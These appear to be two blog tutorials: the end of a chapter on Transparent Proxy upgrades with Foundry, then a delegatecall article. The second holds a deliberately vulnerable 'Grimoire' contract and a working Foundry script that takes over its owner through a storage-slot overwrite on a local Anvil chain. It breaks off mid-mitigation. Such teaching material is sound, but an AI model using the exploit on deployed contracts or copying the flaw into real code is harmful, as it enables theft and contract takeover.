To make things simpler, you can configure the `foundry.toml` file to include your default RPC URL. This way, you won’t need to specify `--rpc-url` every time you interact with the blockchain. Add the following line to your `foundry.toml` file:

```toml
eth_rpc_url = &quot;http://127.0.0.1:8545&quot;

```

With Anvil running and the environment variables set, deploy the contracts using Foundry:

```bash
forge script script/Deploy.s.sol --broadcast

```

This command compiles the contracts, runs the deployment script, and deploys everything to your local Anvil network.

![](/content/images/2025/01/image-7.png)

Deployment of the contracts

# Interacting with the Transparent Proxy Using Foundry Scripts

Now that the Transparent Proxy is deployed, it’s time to interact with it and see how it handles calls to the implementation contract. For this, we’ll use a simple Foundry script. To keep things clean and modular, we’ll define an interface to specify the functions we want to call on the proxy. This is just a convenient way to interact with the contract without pulling in its entire codebase.

Here’s the script we’ll use:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;

interface ProxyInterface {
    function setStoredValue(uint256 value) external;
    function getStoredValue() external view returns (uint256);
    function upgradeTo(address newImplementation) external;
    function getVersion() external view returns (string memory);
}

contract Interacting is Script {
    // Reference the deployed Transparent Proxy
    ProxyInterface transparentProxy = ProxyInterface(0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512);

    function run() external {
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        transparentProxy.setStoredValue(150);
        console.log(&quot;Value set to 150&quot;);

        uint256 value = transparentProxy.getStoredValue();
        console.log(&quot;Retrieved Value: &quot;, value);

        vm.stopBroadcast();
    }
}

```

In this script, the Transparent Proxy is referenced by its address, which is passed into the `ProxyInterface`. This address (`0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512`) should be replaced with the actual address of the proxy from your deployment. The `ProxyInterface` gives us access to the functions we want to call, like `setStoredValue` and `getStoredValue`.

The action starts in the `run` function. It begins by broadcasting transactions using `vm.startBroadcast` with the admin’s private key. This step is crucial because interacting with the proxy requires valid, signed blockchain transactions. Once broadcasting is live, the script sets a value by calling `setStoredValue(150)` through the proxy. The call is delegated to the implementation&apos;s code, but because `delegatecall` executes in the proxy&apos;s context, the new value is written to the proxy&apos;s own storage. To confirm the operation, `console.log` prints a message to the console.

After setting the value, the script retrieves it using the `getStoredValue` function. This call also goes through the proxy, which forwards it to the implementation contract. The returned value is logged, allowing us to verify that the proxy is forwarding calls correctly and that the state has been updated as expected.

Finally, the script stops broadcasting with `vm.stopBroadcast`, marking the end of the interaction. The whole process demonstrates the proxy’s ability to forward function calls seamlessly while keeping the state in the proxy itself, with the implementation contract supplying only the logic.

Running this script is simple, and you’ll see the results directly in the console. It’s a straightforward way to test the functionality of the Transparent Proxy and ensure everything is working as intended. You can build on this script to test upgrades or add more complex interactions, but for now, it’s a solid foundation to understand how the proxy operates 😄

```bash
forge script script/DeployFirstCase.sol --tc Interacting --broadcast

```

![](/content/images/2025/01/image-8.png)

Interacting with the Proxy

# Updating the Implementation: Upgrading the Transparent Proxy

Once the Transparent Proxy is deployed and working, the next step is to upgrade its underlying implementation. This process allows us to deploy a new version of the implementation contract and point the proxy to the updated version, ensuring the contract logic evolves while maintaining the same proxy address. Below is the Foundry script to perform the upgrade, along with a detailed explanation of how it works.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;
import {ImplementationV1} from &quot;../src/ImplementationV1.sol&quot;; // adjust the path to your project layout

interface ProxyInterface {
    function setStoredValue(uint256 value) external;
    function getStoredValue() external view returns (uint256);
    function upgradeTo(address newImplementation) external;
    function getVersion() external view returns (string memory);
}

contract UpdatingImplementation is Script {
    // Reference the deployed Transparent Proxy
    ProxyInterface proxy = ProxyInterface(0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512);

    function run() external {
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        // Deploy the new implementation contract
        // (this demo redeploys ImplementationV1 to keep the example self-contained;
        //  a real upgrade would deploy an ImplementationV2 with the changed logic)
        ImplementationV1 implementation = new ImplementationV1();
        console.log(&quot;ImplementationV1 deployed at:&quot;, address(implementation));

        // Display the current implementation version
        console.log(&quot;Current Version: &quot;, proxy.getVersion());

        // Upgrade the proxy to use the new implementation
        proxy.upgradeTo(address(implementation));

        // Verify the new implementation version
        console.log(&quot;New Version: &quot;, proxy.getVersion());

        vm.stopBroadcast();
    }
}

```

This script handles the upgrade process step by step, starting with the deployment of a new implementation contract and ending with a verification of the upgrade. Here’s how it works:

The `ProxyInterface` allows the script to interact with the proxy, specifically calling the `upgradeTo` and `getVersion` functions. The proxy is referenced by its deployed address (`0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512`), which you should replace with the actual proxy address from your deployment.

The script begins by broadcasting transactions using `vm.startBroadcast` with the admin’s private key. This ensures that the transactions are properly signed and authorized. The admin then deploys the new implementation contract by creating an instance of `ImplementationV1` (reused here for simplicity; pointing the proxy at an `ImplementationV2` works exactly the same way). The script logs the new implementation’s address for reference.

After deploying the new implementation, the script retrieves and logs the current implementation version by calling `proxy.getVersion()`. This confirms the current state of the proxy before the upgrade.

The `upgradeTo` function is then called on the proxy, passing the address of the newly deployed implementation contract. This updates the proxy to point to the new implementation. The script follows up by calling `proxy.getVersion()` again to confirm that the proxy is now using the updated implementation.

Finally, `vm.stopBroadcast` is called to end the transaction broadcasting, completing the upgrade process.

```bash
forge script script/DeployFirstCase.sol --tc UpdatingImplementation --broadcast

```

![](/content/images/2025/01/image-11.png)

Upgrading the Implementation

# Common Vulnerabilities in Transparent Proxies

Transparent Proxies are undeniably useful, but like any powerful tool, they come with their own set of risks. Knowing the common vulnerabilities in these proxies is essential for anyone looking to implement or audit them effectively.

One major issue often encountered is **unrestricted upgrade access**. If the `upgradeTo` function isn’t properly protected, a malicious actor could exploit it to deploy their own version of the implementation contract, potentially stealing funds or breaking functionality. This highlights the importance of tightly controlling the admin address and ensuring only authorized parties can manage upgrades. Multi-signature wallets are a great way to reduce the risk of a single point of failure.

Another critical [vulnerability is **storage collision**](https://www.kayssel.com/post/web3-9/). Transparent Proxies rely on specific storage slots, such as `ADMIN_SLOT` and `IMPLEMENTATION_SLOT`, to store critical data. If an implementation contract accidentally overlaps with these reserved slots, it can corrupt the proxy’s state and lead to unexpected behavior. Following the EIP-1967 standard for storage slots is a best practice to avoid these conflicts.
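As a hypothetical illustration of a layout collision, consider an upgrade that inserts a new variable before the existing ones (sketch, assuming the `ImplementationV1` from earlier in this chapter):

```solidity
// Hypothetical broken upgrade: a new variable is inserted BEFORE storedValue.
contract BadImplementationV2 {
    address public owner;       // now occupies slot 0
    uint256 public storedValue; // pushed to slot 1
}
// Through the proxy, owner now aliases the old storedValue bytes in slot 0,
// and storedValue reads whatever happened to be in slot 1. New variables must
// only ever be appended after the existing layout.
```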

The implementation contract itself can also introduce vulnerabilities, such as through [**delegatecall exploits**](https://www.kayssel.com/post/web3-10/). Since the proxy uses `delegatecall` to execute functions in the implementation’s context, any malicious or poorly written code in the implementation can manipulate the proxy’s state. This makes thorough auditing of the implementation contract critical. Reentrancy attacks, unchecked inputs, or careless state manipulation in the implementation are common areas to scrutinize.

A subtle but devastating risk is **losing admin privileges**. If the admin address is ever set to `address(0)` or another unintended address, the proxy can no longer be managed, effectively freezing its state. This makes it essential to validate all admin changes and include recovery mechanisms, such as a time-lock or an emergency reset option.
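One mitigation is a two-step handover, where the new admin must actively claim the role before it takes effect. Here is a sketch of hypothetical additions to the example proxy (not part of the code above):

```solidity
// Hypothetical two-step admin transfer. A mistyped address can no longer
// brick upgrades, because the wrong address will simply never claim the role.
// (In a real proxy, pendingAdmin should live in its own reserved slot so it
// cannot collide with implementation storage under delegatecall.)
address private pendingAdmin;

function transferAdmin(address newAdmin) external {
    require(msg.sender == _getAdmin(), &quot;Not authorized&quot;);
    require(newAdmin != address(0), &quot;Admin cannot be zero address&quot;);
    pendingAdmin = newAdmin;
}

function acceptAdmin() external {
    require(msg.sender == pendingAdmin, &quot;Not pending admin&quot;);
    _setAdmin(msg.sender);
    pendingAdmin = address(0);
}
```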

Lastly, there’s the danger of **malicious upgrades**. Even when the upgrade process itself is secure, a poorly vetted or intentionally malicious new implementation can introduce backdoors, corrupt storage, or otherwise compromise the proxy’s integrity. Implementing validation checks and allowing time for audits before deploying upgrades is a good practice to avoid such scenarios.

# Wrapping Up: Proxies in Action

Transparent Proxies, as we’ve seen, are a simple yet powerful tool for making smart contracts upgradeable. They act as the middleman, forwarding user calls to the implementation contract while ensuring the contract&apos;s address and state remain stable. We’ve explored their inner workings, deployed them, interacted with them, and even upgraded them seamlessly. By now, you should have a solid understanding of how they operate and why they’re a go-to choice in the world of smart contracts.

From their admin-controlled upgrades to their ability to separate logic from storage, Transparent Proxies make the upgrade process straightforward. However, they’re not without their limitations. For instance, the reliance on centralized admin control can introduce risks if not properly secured. That’s where more advanced patterns like **UUPS Proxies** come into play, offering a slightly different approach to the upgrade process.

In the next chapter, we’ll dive into **UUPS Proxies (Universal Upgradeable Proxy Standard)**. You’ll learn how they differ from Transparent Proxies, why they’re favored for reducing gas costs, and how their upgrade logic shifts from the proxy to the implementation contract itself. If you thought Transparent Proxies were cool, wait until you see UUPS in action.

So, buckle up, because we’re taking your knowledge of proxies to the next level. Until then, keep exploring, testing, and thinking critically about how these tools can be both a feature and a potential attack surface. Onward to UUPS! 🚀

# References

1.  Foundry - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
2.  Solidity - Understanding `delegatecall` and Low-Level Functions. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call](https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call)
3.  Trail of Bits - Common Pitfalls with `delegatecall`. &quot;Trail of Bits Blog.&quot; Available at: [https://blog.trailofbits.com/](https://blog.trailofbits.com/)
4.  Storage in Solidity - Detailed Analysis of Solidity Storage Mechanics. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/en/latest/internals/layout\_in\_storage.html](https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html)
5.  Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
6.  Anvil - A Local Ethereum Development Node for Testing Smart Contracts. &quot;Anvil Documentation.&quot; Available at: [https://book.getfoundry.sh/anvil/](https://book.getfoundry.sh/anvil/)
7.  OpenZeppelin - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)</content:encoded><author>Ruben Santos</author></item><item><title>The Magic and Mayhem of delegatecall: A Deep Dive into Solidity’s Most Powerful Feature</title><link>https://www.kayssel.com/post/web3-10</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-10</guid><description>delegatecall is a powerful Solidity feature enabling one contract to execute another’s code while using its own storage. This flexibility allows for upgradable designs but poses risks like storage overwrites and exploits. Learn how it works, its pitfalls, and how to mitigate them effectively.</description><pubDate>Sun, 12 Jan 2025 11:24:09 GMT</pubDate><content:encoded># **Introduction: Unlocking the Secrets of `delegatecall`**

In the world of Solidity, few features offer as much power—and danger—as `delegatecall`. This low-level function is like a magical incantation, allowing one contract to execute the code of another as if it were its own. It’s the cornerstone of upgradable contracts and shared libraries, making it an invaluable tool for smart contract developers. But, as with any spell, using it without caution can lead to unintended and sometimes disastrous consequences.

In this article, we’ll dive deep into the workings of `delegatecall`, exploring its strengths and inherent risks. We’ll examine a fascinating example of a vulnerable contract—the **Magical Grimoire**—to see how a small design oversight can open the door to exploits. Along the way, we’ll also look at strategies to mitigate these vulnerabilities and ensure your contracts are both flexible and secure.

By the end, you’ll not only understand how `delegatecall` works but also how to wield it responsibly. Let’s start unraveling the mysteries of this powerful feature—and see why it’s both a gift and a curse for Solidity developers.

# **What is `delegatecall` in Solidity?**

If `delegatecall` were a spell in a wizard&apos;s grimoire, it’d be labeled &quot;Handle with Extreme Caution.&quot; It’s a low-level function in Solidity that allows one contract to temporarily borrow the code of another, running it as if it were its own. This makes `delegatecall` both incredibly powerful and dangerously easy to misuse—a true double-edged sword in the world of smart contracts.

## **How Does `delegatecall` Work?**

Imagine you’re in a self-driving car (the **calling contract**) that can’t navigate certain tricky routes by itself. To solve this, you hire a remote driver (the **target contract**) to control the car temporarily. The remote driver takes over, using your car&apos;s controls (your **storage**) to steer and accelerate. However, here’s the twist:

-   While the remote driver is in charge, they act as if they’re you. If someone asks, “Who’s driving?” they’ll say it’s you (because `msg.sender` and `msg.value` remain unchanged).
-   They don’t use their own car (storage). Instead, any adjustments they make—like changing the seat position or the radio station—are saved in your car.

This works great if the driver follows your instructions, but what if they’re not trustworthy? They might reprogram your GPS (modify your variables) or even disable your brakes (break your contract’s logic). The remote driver doesn’t have their own agenda (storage); everything they do happens in your car.
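
The analogy maps directly onto code. Here is a minimal sketch (contract and function names are illustrative, not from the Grimoire example) showing that the target’s logic writes to the *caller’s* storage and sees the original `msg.sender`:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative sketch: Logic is the remote driver, Car is the calling contract.
contract Logic {
    address public lastDriver; // slot 0 in this layout

    function drive() public {
        lastDriver = msg.sender; // under delegatecall, this writes slot 0 of the CALLER
    }
}

contract Car {
    address public lastDriver; // slot 0 -- same layout as Logic, so the write lands here

    function delegateDrive(address logic) public {
        // Inside Logic.drive(), msg.sender is still whoever called delegateDrive
        (bool ok, ) = logic.delegatecall(abi.encodeWithSignature(&quot;drive()&quot;));
        require(ok, &quot;delegatecall failed&quot;);
    }
}
```

After calling `delegateDrive`, `Car.lastDriver` holds the caller’s address while `Logic.lastDriver` remains untouched: the code ran in `Logic`, but every storage write happened in `Car`.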

## **Why Use `delegatecall`?**

`delegatecall` is often used to create **upgradable contracts**. Imagine deploying a smart contract, only to discover a critical bug. In a traditional setup, you’d need to redeploy everything—what a hassle! With `delegatecall`, a proxy contract handles all interactions while delegating logic to a separate implementation contract. If you need to update your code, you simply replace the implementation contract without touching the proxy.

Some common use cases include:

-   **Proxy Contracts:** These allow you to swap out old logic for new without losing your contract&apos;s state.
-   **Libraries:** Shared functionality can live in a library, reducing redundancy across contracts.

### **The Risks of `delegatecall`**

As Uncle Ben said, &quot;With great power comes great responsibility.&quot; Here’s why `delegatecall` is not for the faint of heart:

1.  **Storage Overwrites:** The target contract manipulates your storage slots. If the storage layouts don’t match perfectly, chaos ensues—picture hiring a plumber to fix a leaky faucet, only to find your TV mounted in the bathroom.
2.  **Evil Contractors:** If the target contract is malicious or can be swapped out by an attacker, they can wreak havoc on your storage, stealing funds or breaking functionality.
3.  **Context Confusion:** The `msg.sender` and `msg.value` refer to the original caller, not the target contract. If access control relies on `msg.sender`, this can lead to accidental open doors for attackers.
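
Risk 1 (storage overwrites) is easiest to see with a concrete layout mismatch. A hypothetical sketch:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical contracts whose storage layouts disagree on slot order
contract Vault {
    address public owner;   // slot 0
    uint256 public balance; // slot 1
}

contract BuggyLib {
    uint256 public balance; // slot 0 -- collides with Vault.owner!
    address public owner;   // slot 1

    function deposit(uint256 amount) public {
        balance += amount; // via delegatecall from Vault, this mangles Vault.owner
    }
}
```

If `Vault` delegatecalls `BuggyLib.deposit`, the `balance += amount` write targets slot 0, reinterpreting the owner address as an integer and corrupting it: the plumber just mounted your TV in the bathroom.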

Now that we’ve explored what `delegatecall` is and how it works, let’s dive into an example of a vulnerable contract to better understand the potential pitfalls and risks this powerful feature can introduce.

# **The Magical Grimoire: A Contract of Enchantment**

Imagine a mystical book of spells, the **Grimoire**, governed by a master wizard who holds the power to unleash its magic. The contract is designed to manage spells dynamically, allowing the master wizard to cast new enchantments and set a unique **special spell** that only they can define.

At its core, the Grimoire maintains three key pieces of state:

1.  **MasterWizard**: The identity of the current master wizard, stored as a string, representing the address of the deploying account.
2.  **Spell**: The currently active spell that can be updated through external interaction.
3.  **SpecialSpell**: A unique and powerful spell that only the master wizard has the authority to define.

The Grimoire’s functionality revolves around its ability to call upon external libraries, like the **SpellLibrary**, to execute new spells. The magic happens through the `castSpell` function, which dynamically delegates calls to an external contract, allowing the Grimoire to expand its repertoire of spells.

Today, our mission is clear: to outwit the Grimoire&apos;s defenses and claim the title of Master Wizard, seizing control of its spells and unlocking the full extent of its magical power.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import &quot;forge-std/console.sol&quot;;

// The Magical Grimoire (vulnerable contract)
contract Grimoire {
    string public masterWizard; // The wizard controlling the grimoire (stored as a string)
    string public specialSpell; // A special spell only the master wizard can set
    string public spell; // The currently active spell

    constructor() {
        // Converts the deploying address to a string and assigns it as the masterWizard
        masterWizard = toString(msg.sender);
    }

    // Function to cast spells using an external library
    function castSpell(address spellLibrary, bytes memory spellData) public {
        (bool success, ) = spellLibrary.delegatecall(spellData);
        require(success, &quot;The spell failed!&quot;);
    }

    // Allows the master wizard to set a special spell
    function setSpecialSpell(string memory newSpell) public {
        require(
            compareStrings(masterWizard, toString(msg.sender)),
            &quot;Only the masterWizard can set special spells&quot;
        );
        specialSpell = newSpell;
    }

    // Helper: Converts an address to a string
    function toString(address account) internal pure returns (string memory) {
        bytes32 value = bytes32(uint256(uint160(account)));
        bytes memory alphabet = &quot;0123456789abcdef&quot;;

        bytes memory str = new bytes(42); // 42 characters: 2 for &quot;0x&quot; + 40 for the address
        str[0] = &quot;0&quot;;
        str[1] = &quot;x&quot;;
        for (uint256 i = 0; i &lt; 20; i++) {
            str[2 + i * 2] = alphabet[uint8(value[i + 12] &gt;&gt; 4)]; // Extract the first nibble
            str[3 + i * 2] = alphabet[uint8(value[i + 12] &amp; 0x0f)]; // Extract the second nibble
        }
        return string(str);
    }

    // Helper: Compares two strings for equality
    function compareStrings(
        string memory a,
        string memory b
    ) internal pure returns (bool) {
        return keccak256(abi.encodePacked(a)) == keccak256(abi.encodePacked(b));
    }
}

// Spell library (initially trusted)
contract SpellLibrary {
    string public spell; // Stores the active spell in the library

    // Sets a spell in the grimoire
    function setSpell(string memory newSpell) public {
        spell = newSpell;
    }
}

```
&lt;/details&gt;


Before we embark on this quest, let’s take a closer look at how the contract works in detail.

### **How It Works**

#### **Casting a Spell**

The Grimoire uses the `castSpell` function to interact with an external spell library. This function takes two inputs:

-   The address of the library contract.
-   Encoded data representing the spell to be cast.

The `delegatecall` keyword is used to execute the logic from the spell library within the context of the Grimoire, allowing the contract to dynamically expand its capabilities without requiring modifications to its own code.

```solidity
function castSpell(address spellLibrary, bytes memory spellData) public {
    (bool success, ) = spellLibrary.delegatecall(spellData);
    require(success, &quot;The spell failed!&quot;);
}

```

If the spell executes successfully, the Grimoire can update its state using the delegated logic.

#### **Master Wizard Privileges**

The master wizard, identified by the `masterWizard` variable, is granted exclusive rights to set a **special spell**. This function ensures that only the rightful master can define this unique magic:

```solidity
function setSpecialSpell(string memory newSpell) public {
    require(
        compareStrings(masterWizard, toString(msg.sender)),
        &quot;Only the masterWizard can set special spells&quot;
    );
    specialSpell = newSpell;
}

```

The comparison uses a helper function, `compareStrings`, to ensure the caller’s identity matches the stored master wizard string.

#### **Utility Functions**

Two utility functions bring convenience to the Grimoire’s design:

-   `toString`: Converts an Ethereum address into a string representation.
-   `compareStrings`: A simple yet effective function that compares two strings by hashing them with `keccak256`.

### **The SpellLibrary**

The **SpellLibrary** serves as the source of external logic that the Grimoire can invoke. It currently includes a single function, `setSpell`, which updates the spell stored in the Grimoire’s state:

```solidity
function setSpell(string memory newSpell) public {
    spell = newSpell;
}

```

This modular design ensures that the Grimoire can adopt new spells on the fly, making it a highly flexible system.

### **What Makes This Design Interesting?**

The Grimoire is a fascinating example of modular contract design:

-   It leverages external libraries to dynamically expand functionality.
-   It enforces access control for critical functions like `setSpecialSpell`.
-   It showcases how utility functions can handle non-trivial operations, such as converting addresses to strings.

In the next section, we’ll explore the potential consequences of this approach, shedding light on what can happen when powerful tools like `delegatecall` are not handled with sufficient care.

# **The Strategy: Becoming the Master Wizard**

To exploit the Grimoire contract and claim the title of Master Wizard, the key lies in understanding how `delegatecall` interacts with the contract&apos;s storage. As we’ve seen, `delegatecall` allows the Grimoire to execute functions from the SpellLibrary, but with the **Grimoire’s storage** as the context. This opens a door for anyone with sufficient knowledge of the storage layout to manipulate critical variables—like `masterWizard`.

Here’s the strategy in a nutshell:

1.  **Leverage `castSpell`:** The Grimoire’s `castSpell` function gives us the ability to call any function in the SpellLibrary. Since `delegatecall` uses the caller&apos;s storage, any modifications made by the library will directly affect the Grimoire’s state.
2.  **Target the Storage Slot:** In Solidity, [variables are stored in sequential slots](https://www.kayssel.com/post/web3-9/). The `masterWizard` variable resides in the first storage slot (slot 0), and this slot can be overwritten by the SpellLibrary’s logic.
3.  **Call a Function in SpellLibrary:** The `SpellLibrary` contract includes the `setSpell` function, which writes data into its `spell` variable. When called via `delegatecall`, this function will overwrite the Grimoire’s storage at slot 0, inadvertently modifying `masterWizard`.
4.  **Overwrite `masterWizard` with Your Address:** By encoding your address as a string and passing it to the `setSpell` function, you can replace the current `masterWizard` with yourself.

```mermaid
sequenceDiagram
    participant Attacker as Attacker
    participant Grimoire as Grimoire Contract
    participant SpellLibrary as SpellLibrary Contract
    participant Storage as Grimoire&apos;s Storage

    %% Step 1: Attacker initiates the attack
    Attacker-&gt;&gt;Grimoire: Call castSpell(spellLibrary, setSpellData)
    note right of Grimoire: castSpell uses delegatecall&lt;br&gt;to execute SpellLibrary&apos;s setSpell

    %% Step 2: Delegatecall transfers control
    Grimoire-&gt;&gt;SpellLibrary: delegatecall(setSpell)
    note right of SpellLibrary: Logic executes in Grimoire’s context&lt;br&gt;using Grimoire’s storage

    %% Step 3: SpellLibrary logic modifies storage
    SpellLibrary-&gt;&gt;Storage: Overwrite slot 0&lt;br&gt;(masterWizard) with attacker’s address
    note left of Storage: masterWizard replaced by attacker

    %% Step 4: Control is returned to the attacker
    Grimoire-&gt;&gt;Attacker: Return control&lt;br&gt;masterWizard now attacker
    note left of Attacker: Attacker becomes Master Wizard&lt;br&gt;and can cast special spells

```

In the next section, we’ll break down the exploit script step by step, illustrating exactly how to claim the title of Master Wizard and unleash your spells. Stay tuned—it’s time to wield the Grimoire’s magic like never before!

# **Simulating the Setup: Deploying the Grimoire and SpellLibrary**

Before diving into the exploit, let’s first ensure we have the magical battlefield ready. Remember to start **Anvil**, as we’ve done in previous chapters, to simulate the Ethereum environment locally. If you’re running a local environment and want to replicate the scenario, you’ll need to deploy both the **Grimoire** and the **SpellLibrary** contracts. Below is a deployment script written for Foundry, which simplifies this process.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Deployment Script for Foundry
import &quot;forge-std/Script.sol&quot;;
import &quot;forge-std/console.sol&quot;;
import &quot;../src/Grimoire.sol&quot;;

contract DeployGrimoire is Script {
    function run() public {
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;)); // Begin broadcasting transactions

        // Deploy Grimoire
        Grimoire grimoire = new Grimoire();
        console.log(&quot;Grimoire deployed at:&quot;, address(grimoire));

        // Deploy SpellLibrary
        SpellLibrary spellLibrary = new SpellLibrary();
        console.log(&quot;SpellLibrary deployed at:&quot;, address(spellLibrary));

        vm.stopBroadcast(); // End broadcasting transactions
    }
}

```

#### **How It Works**

1.  The script uses Foundry’s `vm.startBroadcast` to simulate transactions signed with the admin&apos;s private key.
2.  The **Grimoire** is deployed first, and its address is logged.
3.  The **SpellLibrary** is then deployed, serving as the source of magic for our Grimoire.
4.  Both addresses are printed, so you can reference them in the exploit script.

```bash
forge script scripts/DeployGrimoire.s.sol --rpc-url http://127.0.0.1:8545 --broadcast

```

![](/content/images/2025/01/image-5.png)

Running the Deployment Script

Once deployed, you’re ready to proceed with the fun part—claiming the title of Master Wizard!

# **The Exploit: Becoming the Master Wizard**

With the battlefield set, let’s dive into the exploit. The objective is clear: use the Grimoire’s `delegatecall` to overwrite the `masterWizard` variable and seize control of the contract. Here’s the plan:

1.  **Log the Current MasterWizard:** Start by reading the `masterWizard` value, ensuring it’s still controlled by the original deployer.
2.  **Craft the Payload:** Encode a call to the `setSpell` function in the SpellLibrary, passing your address as a string.
3.  **Execute the Payload:** Use `castSpell` to delegate the call to the SpellLibrary, which will overwrite the `masterWizard` in the Grimoire.
4.  **Claim Your Powers:** Verify the new `masterWizard` value and demonstrate control by setting a special spell.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;forge-std/console.sol&quot;;
import &quot;../src/Grimoire.sol&quot;;

contract GrimoireAttack is Script {
    Grimoire grimoire = Grimoire(0x5FbDB2315678afecb367f032d93F642f64180aa3); // Address of the Grimoire contract
    address spellLibrary = 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512; // Address of the SpellLibrary contract

    function run() external {
        // Start broadcasting the attacker&apos;s transactions
        vm.startBroadcast(vm.envUint(&quot;ATTACKER_KEY&quot;));

        // Log the current MasterWizard value
        console.log(&quot;Current masterWizard:&quot;, grimoire.masterWizard());

        // Encode the call to `setSpell` in the SpellLibrary
        bytes memory setSpellData = abi.encodeWithSignature(
            &quot;setSpell(string)&quot;, 
            &quot;0x70997970c51812dc3a010c7d01b50e0d17dc79c8&quot; // Attacker&apos;s address as a string
        );

        // Execute the `castSpell` function to overwrite masterWizard
        grimoire.castSpell(spellLibrary, setSpellData);

        // Verify the new MasterWizard value
        console.log(&quot;masterWizard after the attack:&quot;, grimoire.masterWizard());

        // Use your new powers to set a special spell
        grimoire.setSpecialSpell(&quot;Fire++&quot;);

        // Verify the modified special spell
        console.log(&quot;Special spell modified:&quot;, grimoire.specialSpell());

        // Stop broadcasting the attacker&apos;s transactions
        vm.stopBroadcast();
    }
}

```

### **Step-by-Step Explanation**

1.  **Logging the Current MasterWizard:** The script first prints the `masterWizard` to show it’s controlled by the original deployer.
2.  **Crafting the Payload:** The payload is encoded with the `abi.encodeWithSignature` function, targeting `setSpell` in the SpellLibrary. The key detail here is passing the attacker’s address as a string to overwrite the `masterWizard`.
3.  **Executing the Attack:** The `castSpell` function in Grimoire delegates the call to SpellLibrary’s `setSpell`. Since `delegatecall` uses the Grimoire’s storage, the value intended for `spell` in SpellLibrary instead overwrites `masterWizard` in Grimoire.
4.  **Verifying Control:** After executing the payload, the script prints the updated `masterWizard` value to confirm the attacker is now in control.
5.  **Flexing Your Powers:** With the title of Master Wizard secured, the attacker uses `setSpecialSpell` to set a custom spell, demonstrating complete control over the contract.

![](/content/images/2025/01/image-6.png)

Results After Running The Exploit
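
If you want to confirm the overwrite independently, you can read the Grimoire’s raw storage with `cast` (the address below is the local deployment address from the earlier step; your values may differ):

```bash
# Slot 0 of a long string stores length * 2 + 1 (a 42-character string gives 85 = 0x55)
cast storage 0x5FbDB2315678afecb367f032d93F642f64180aa3 0

# The string bytes themselves start at keccak256(slot 0)
cast storage 0x5FbDB2315678afecb367f032d93F642f64180aa3 \
  $(cast keccak 0x0000000000000000000000000000000000000000000000000000000000000000)
```

The second command should return the first 32 bytes of the attacker’s address string, confirming that slot 0 of the Grimoire now describes the attacker rather than the deployer.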

In the next section, we’ll explore how to mitigate vulnerabilities like this and ensure contracts remain safe from malicious wizards. Stay tuned—because every spell has a counterspell. 🧙‍♂️✨

# **Top 3 Solutions to Mitigate the Vulnerability**

`delegatecall` can be a powerful tool, but its misuse can turn your contract into a ticking time bomb. To prevent exploits like the one we’ve just seen, here are the top three solutions to mitigate this vulnerability:

## **Strictly Validate Trusted Contracts**

One of the main issues with the Grimoire contract is its blind trust in any contract passed to `castSpell`. By ensuring only pre-approved, secure libraries are used, you can eliminate the risk of malicious or unintended storage overwrites.

#### **Implementation**

-   Introduce a whitelist of trusted library addresses.
-   Validate the address before executing `delegatecall`.

```solidity
mapping(address =&gt; bool) private trustedLibraries;

// Assumes an Ownable-style onlyOwner modifier is available
function addLibrary(address libraryAddress) public onlyOwner {
    trustedLibraries[libraryAddress] = true;
}

function castSpell(address spellLibrary, bytes memory spellData) public {
    require(trustedLibraries[spellLibrary], &quot;Library not trusted&quot;);
    (bool success, ) = spellLibrary.delegatecall(spellData);
    require(success, &quot;The spell failed!&quot;);
}

```

#### **Benefit**

This approach ensures that only vetted contracts can execute logic on behalf of the Grimoire, significantly reducing the risk of malicious overwrites.

## **Avoid State-Dependent Delegate Calls**

Whenever possible, avoid using `delegatecall` for contracts that rely on shared storage. Instead, structure your system to separate state and logic, minimizing the potential for unintended consequences.

#### **Implementation**

Adopt an **upgradeable proxy pattern**, but isolate state variables in a dedicated storage contract. The proxy only forwards calls to an implementation contract without sharing storage directly.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```solidity
contract Proxy {
    address private implementation; // Address of the logic contract

    // Assumes an Ownable-style onlyOwner modifier is available
    function upgrade(address newImplementation) public onlyOwner {
        implementation = newImplementation;
    }

    fallback() external payable {
        (bool success, ) = implementation.delegatecall(msg.data);
        require(success, &quot;Delegatecall failed&quot;);
    }
}

contract Storage {
    string public masterWizard;
    string public spell;
    string public specialSpell;
}

```
&lt;/details&gt;


#### **Benefit**

This approach ensures storage remains consistent and prevents unexpected overwrites, as the logic and storage are decoupled.

## **Implement Slot-Level Access Controls**

If `delegatecall` is unavoidable, enforce strict access controls on critical storage slots. The Grimoire could have implemented a modifier to protect the `masterWizard` variable from unintended overwrites.

#### **Implementation**

